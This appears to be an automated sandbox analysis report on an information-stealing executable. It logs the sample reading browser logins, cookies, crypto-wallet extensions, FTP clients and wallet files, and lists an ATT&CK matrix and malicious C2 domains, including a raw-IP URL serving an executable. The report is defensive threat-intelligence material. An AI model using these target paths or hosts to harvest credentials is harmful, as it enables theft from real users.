            Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk
            Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
            Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
            Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn
            Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi
            Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite
            Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb
            Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk
            Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
            Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd
            Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account
            Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn
            Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj
            Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao
            Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account
            Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk
            Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf
            Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec
            Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd
            Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje
            Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc
            Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno
            Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf
            Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cert9.db
            Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm
            Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\formhistory.sqlite
            Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic
            Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd
            Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi
            Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap
            Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh
            Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa
            Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn
            Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad
            Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\logins.json
            Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc
            Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg
            Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh
            Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa
            Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
            Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn
            Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd
            Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak
            Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp
            Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo
            Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp
            Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite
            Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles
            Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb
            Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch
            Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm
            Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch
            Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe
            Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj
            Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne
            Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk
            Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma
            Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil
            Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac
            Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno
            Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig
            Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg
            Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb
            Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
            Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba
            Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla
            Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih
            Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge
            Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik
            Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad
            Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef
            Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb
            Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp
            Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
            Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj
            Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Roaming\FTPGetter
            Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Roaming\FTPInfo
            Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites
            Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Roaming\FTPbox
            Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Roaming\FTPRush
            Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Roaming\Conceptworld\Notezilla
            Source: C:\Users\user\Desktop\file.exe | File opened: C:\ProgramData\SiteDesigner\3D-FTP
            Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
            Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
            Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Roaming\Ledger Live
            Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
            Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
            Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
            Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets
            Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Roaming\Binance
            Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB
            Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Roaming\Electrum\wallets
            Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets
            Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB
            Source: C:\Users\user\Desktop\file.exe | Directory queried: C:\Users\user\Documents
            Source: C:\Users\user\Desktop\file.exe | Directory queried: C:\Users\user\Documents
            Source: C:\Users\user\Desktop\file.exe | Directory queried: C:\Users\user\Documents\LTKMYBSEYZ
            Source: C:\Users\user\Desktop\file.exe | Directory queried: C:\Users\user\Documents\MXPXCVPDVN
            Source: C:\Users\user\Desktop\file.exe | Directory queried: C:\Users\user\Documents\NIKHQAIQAU
            Source: C:\Users\user\Desktop\file.exe | Directory queried: C:\Users\user\Documents\NWTVCDUMOB
            Source: C:\Users\user\Desktop\file.exe | Directory queried: C:\Users\user\Documents\NWTVCDUMOB
            Source: C:\Users\user\Desktop\file.exe | Directory queried: C:\Users\user\Documents\ONBQCLYSPU
            Source: C:\Users\user\Desktop\file.exe | Directory queried: C:\Users\user\Documents\RAYHIWGKDI
            Source: C:\Users\user\Desktop\file.exe | Directory queried: C:\Users\user\Documents\UMMBDNEQBN
            Source: C:\Users\user\Desktop\file.exe | Directory queried: C:\Users\user\Documents\VAMYDFPUND
            Source: C:\Users\user\Desktop\file.exe | Directory queried: C:\Users\user\Documents\VAMYDFPUND
            Source: C:\Users\user\Desktop\file.exe | Directory queried: C:\Users\user\Documents\VLZDGUKUTZ
            Source: C:\Users\user\Desktop\file.exe | Directory queried: C:\Users\user\Documents\VLZDGUKUTZ
            Source: C:\Users\user\Desktop\file.exe | Directory queried: C:\Users\user\Documents
            Source: C:\Users\user\Desktop\file.exe | Directory queried: C:\Users\user\Documents\LTKMYBSEYZ
            Source: C:\Users\user\Desktop\file.exe | Directory queried: C:\Users\user\Documents\MXPXCVPDVN
            Source: C:\Users\user\Desktop\file.exe | Directory queried: C:\Users\user\Documents\NIKHQAIQAU
            Source: C:\Users\user\Desktop\file.exe | Directory queried: C:\Users\user\Documents\ONBQCLYSPU
            Source: C:\Users\user\Desktop\file.exe | Directory queried: C:\Users\user\Documents\RAYHIWGKDI
            Source: C:\Users\user\Desktop\file.exe | Directory queried: C:\Users\user\Documents\UMMBDNEQBN
            Source: C:\Users\user\Desktop\file.exe | Directory queried: C:\Users\user\Documents\VAMYDFPUND
            Source: C:\Users\user\Desktop\file.exe | Directory queried: C:\Users\user\Documents\VLZDGUKUTZ
            Source: C:\Users\user\Desktop\file.exe | Directory queried: C:\Users\user\Documents
            Source: C:\Users\user\Desktop\file.exe | Directory queried: C:\Users\user\Documents\LTKMYBSEYZ
            Source: C:\Users\user\Desktop\file.exe | Directory queried: C:\Users\user\Documents\MXPXCVPDVN
            Source: C:\Users\user\Desktop\file.exe | Directory queried: C:\Users\user\Documents\NIKHQAIQAU
            Source: C:\Users\user\Desktop\file.exe | Directory queried: C:\Users\user\Documents\NIKHQAIQAU
            Source: C:\Users\user\Desktop\file.exe | Directory queried: C:\Users\user\Documents\NWTVCDUMOB
            Source: C:\Users\user\Desktop\file.exe | Directory queried: C:\Users\user\Documents\ONBQCLYSPU
            Source: C:\Users\user\Desktop\file.exe | Directory queried: C:\Users\user\Documents\RAYHIWGKDI
            Source: C:\Users\user\Desktop\file.exe | Directory queried: C:\Users\user\Documents\UMMBDNEQBN
            Source: C:\Users\user\Desktop\file.exe | Directory queried: C:\Users\user\Documents\VLZDGUKUTZ
            Source: C:\Users\user\Desktop\file.exe | Directory queried: C:\Users\user\Documents
            Source: C:\Users\user\Desktop\file.exe | Directory queried: C:\Users\user\Documents\LTKMYBSEYZ
            Source: C:\Users\user\Desktop\file.exe | Directory queried: C:\Users\user\Documents\NIKHQAIQAU
            Source: C:\Users\user\Desktop\file.exe | Directory queried: C:\Users\user\Documents\ONBQCLYSPU
            Source: C:\Users\user\Desktop\file.exe | Directory queried: C:\Users\user\Documents\RAYHIWGKDI
            Source: C:\Users\user\Desktop\file.exe | Directory queried: C:\Users\user\Documents\UMMBDNEQBN
            Source: C:\Users\user\Desktop\file.exe | Directory queried: C:\Users\user\Documents\VAMYDFPUND
            Source: C:\Users\user\Desktop\file.exe | Directory queried: C:\Users\user\Documents\VLZDGUKUTZ
            Source: C:\Users\user\Desktop\file.exe | Directory queried: C:\Users\user\Documents
            Source: C:\Users\user\Desktop\file.exe | Directory queried: C:\Users\user\Documents\MXPXCVPDVN
            Source: C:\Users\user\Desktop\file.exe | Directory queried: C:\Users\user\Documents\NWTVCDUMOB
            Source: C:\Users\user\Desktop\file.exe | Directory queried: C:\Users\user\Documents\ONBQCLYSPU
            Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\RAYHIWGKDIJump to behavior
            Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\UMMBDNEQBNJump to behavior
            Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\VLZDGUKUTZJump to behavior
            Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
            Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\LTKMYBSEYZJump to behavior
            Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\MXPXCVPDVNJump to behavior
            Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\NIKHQAIQAUJump to behavior
            Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\NWTVCDUMOBJump to behavior
            Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\ONBQCLYSPUJump to behavior
            Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\RAYHIWGKDIJump to behavior
            Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\VAMYDFPUNDJump to behavior
            Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\VLZDGUKUTZJump to behavior
            Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
            Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\LTKMYBSEYZJump to behavior
            Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\NIKHQAIQAUJump to behavior
            Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\NWTVCDUMOBJump to behavior
            Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\ONBQCLYSPUJump to behavior
            Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\RAYHIWGKDIJump to behavior
            Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\VAMYDFPUNDJump to behavior
            Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\VLZDGUKUTZJump to behavior
            Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
            Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\MXPXCVPDVNJump to behavior
            Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\NIKHQAIQAUJump to behavior
            Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\NWTVCDUMOBJump to behavior
            Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\ONBQCLYSPUJump to behavior
            Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\RAYHIWGKDIJump to behavior
            Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\UMMBDNEQBNJump to behavior
            Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\VAMYDFPUNDJump to behavior
            Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\VLZDGUKUTZJump to behavior
Source: Yara match | File source: 00000000.00000003.1711943208.00000000006DE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: file.exe PID: 7472, type: MEMORYSTR

            Remote Access Functionality

Source: Yara match | File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: file.exe PID: 7472, type: MEMORYSTR
Source: Yara match | File source: sslproxydump.pcap, type: PCAP
Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | Windows Management Instrumentation (2) | DLL Side-Loading (1) | Process Injection (1) | Virtualization/Sandbox Evasion (34) | OS Credential Dumping (2) | Query Registry (1) | Remote Services | Archive Collected Data (1) | Encrypted Channel (11) | Exfiltration Over Other Network Medium | Abuse Accessibility Features
Credentials | Domains | Default Accounts | PowerShell (1) | Boot or Logon Initialization Scripts | DLL Side-Loading (1) | Process Injection (1) | LSASS Memory | Security Software Discovery (751) | Remote Desktop Protocol | Data from Local System (41) | Ingress Tool Transfer (1) | Exfiltration Over Bluetooth | Network Denial of Service
Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | Logon Script (Windows) | Deobfuscate/Decode Files or Information (1) | Security Account Manager | Virtualization/Sandbox Evasion (34) | SMB/Windows Admin Shares | Data from Network Shared Drive | Non-Application Layer Protocol (3) | Automated Exfiltration | Data Encrypted for Impact
Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | Obfuscated Files or Information (2) | NTDS | Process Discovery (2) | Distributed Component Object Model | Input Capture | Application Layer Protocol (114) | Traffic Duplication | Data Destruction
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | Software Packing (12) | LSA Secrets | File and Directory Discovery (11) | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | DLL Side-Loading (1) | Cached Domain Credentials | System Information Discovery (223) | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
(Numbers in parentheses are the signature counts the report attaches to each matched technique.)

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet

Source | Detection | Scanner | Label | Link
file.exe | 100% | Avira | TR/Crypt.TPM.Gen |
file.exe | 100% | Joe Sandbox ML | |
No Antivirus matches
No Antivirus matches
No Antivirus matches
Source | Detection | Scanner | Label | Link
https://duckduckgo.com/chrome_newtab | 0% | URL Reputation | safe |
https://duckduckgo.com/ac/?q= | 0% | URL Reputation | safe |
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | 0% | URL Reputation | safe |
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17 | 0% | URL Reputation | safe |
http://x1.c.lencr.org/0 | 0% | URL Reputation | safe |
http://x1.i.lencr.org/0 | 0% | URL Reputation | safe |
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install | 0% | URL Reputation | safe |
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search | 0% | URL Reputation | safe |
https://support.mozilla.org/products/firefoxgro.all | 0% | URL Reputation | safe |
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | 0% | URL Reputation | safe |
http://crl.rootca1.amazontrust.com/rootca1.crl0 | 0% | URL Reputation | safe |
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016 | 0% | URL Reputation | safe |
https://www.ecosia.org/newtab/ | 0% | URL Reputation | safe |
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br | 0% | URL Reputation | safe |
https://ac.ecosia.org/autocomplete?q= | 0% | URL Reputation | safe |
http://crt.rootca1.amazontrust.com/rootca1.cer0? | 0% | URL Reputation | safe |
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples | 0% | URL Reputation | safe |
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q= | 0% | URL Reputation | safe |
Name | IP | Active | Malicious | Antivirus Detection | Reputation
crisiwarny.store | 172.67.170.64 | true | true | | unknown
presticitpo.store | unknown | unknown | true | | unknown
206.23.85.13.in-addr.arpa | unknown | unknown | false | | unknown
Name | Malicious | Antivirus Detection | Reputation
presticitpo.store | true | | unknown
https://crisiwarny.store/api | true | | unknown
necklacedmny.store | true | | unknown
fadehairucw.store | true | | unknown
founpiuer.store | true | | unknown
crisiwarny.store | true | | unknown
scriptyprefej.store | true | | unknown
navygenerayk.store | true | | unknown
thumbystriw.store | true | | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
https://duckduckgo.com/chrome_newtab | file.exe, 00000000.00000003.1712394447.0000000005139000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://duckduckgo.com/ac/?q= | file.exe, 00000000.00000003.1712394447.0000000005139000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://crisiwarny.store/g | file.exe, 00000000.00000003.2064902373.00000000006DE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2064714160.00000000006D7000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
https://crisiwarny.store/apig | file.exe, 00000000.00000002.2086588158.0000000000672000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://185.215.113.16/off/def.exeS | file.exe, 00000000.00000002.2086588158.0000000000672000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | file.exe, 00000000.00000003.1712394447.0000000005139000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://crisiwarny.store/J | file.exe, 00000000.00000003.1711799765.00000000006DE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1711943208.00000000006DE000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17 | file.exe, 00000000.00000003.1712232842.0000000005147000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1712165908.000000000514E000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://crisiwarny.store/bfa | file.exe, 00000000.00000003.1759143782.00000000006F9000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1786059361.00000000006FE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1781336814.00000000006FE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1759468384.00000000006FE000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
https://crisiwarny.store:443/api | file.exe, 00000000.00000002.2086588158.000000000065F000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
